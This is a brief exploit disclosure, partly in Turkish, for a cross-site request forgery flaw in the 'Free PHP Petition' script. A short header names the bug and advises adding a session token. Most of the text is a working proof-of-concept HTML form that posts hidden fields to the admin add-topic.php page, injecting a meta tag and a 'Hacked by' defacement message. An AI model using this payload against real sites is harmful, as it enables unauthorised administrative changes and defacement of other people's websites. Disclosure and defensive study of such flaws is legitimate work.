< ------------------- header data start ------------------- >
#############################################################
# Application Name : Free PHP Petition
# vulnerable Type : XSRF
# Infection : Meta ile Yönlendirilebilir ..!
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !
# author : _iLLeqaL_ ~ Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<form action=http://[site].com/[yol]/signing_system-admin/add-topic.php method=post enctype=multipart/form-data>
<input type=hidden name=name id=name value=Meta Taginiz Burda ! />
<input type=hidden name=description id=description value=Hacked,Hacked by _iLLeqaL_ :)>
<input type=submit name=submit value= O K />
</form>
< -- bug code end of -- >